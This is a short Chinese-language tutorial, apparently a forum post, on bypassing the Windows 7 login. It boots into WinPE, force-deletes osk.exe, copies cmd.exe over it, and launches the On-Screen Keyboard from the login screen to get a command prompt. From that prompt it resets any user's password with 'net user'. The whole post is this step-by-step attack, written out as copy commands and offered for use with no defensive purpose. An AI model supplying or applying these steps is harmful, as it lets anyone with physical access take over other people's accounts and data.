本來在VISTA中就存在的漏洞,不知道為什麼在WIN7中還是沒有將漏洞補上。雖然做了一定得限制(在CMD中刪除OSK文件會出現DENY,拒絕訪問的字樣),不過利用暴力刪除工具依然可以進行刪除。此後再進行替換,刪除則不會出現任何問題。DENY字樣也完全消失。
看來微軟對這個漏洞還是沒有做太大的重視,下邊講一下教程:
准備工具,深度WINPE 3.0
進入CMD命令提示符模式,將OSK.EXE 和 CMD.EXE 拷貝到別的地方
我的WINDOWS 7 裝在E盤,請根據個人情況自行改動,執行以下命令
copy e:\windows\system32\osk.exe e:\
copy e:\windows\system32\cmd.exe e:\
然後利用深度WinPE v3.0 自帶的暴力刪除工具Unlocker將OSK.EXE 刪除(在CMD中無法刪除,WINDOWS 7有系統保護)
然後再利用CMD命令提示符,將CMD.exe 拷貝到SYSTEM32目錄中,並命名為OSK.EXE
copy e:\cmd.exe e:\windows\system32\osk.exe
重新啟動計算機
在登陸界面下,點擊左下角輔助工具,選擇On-Screen Keyboard
命令提示符就出現了,用Net User命令,就可以將用戶密碼更改掉,格式如下
Net user 用戶名 密碼
這樣就重新更改了用戶名密碼
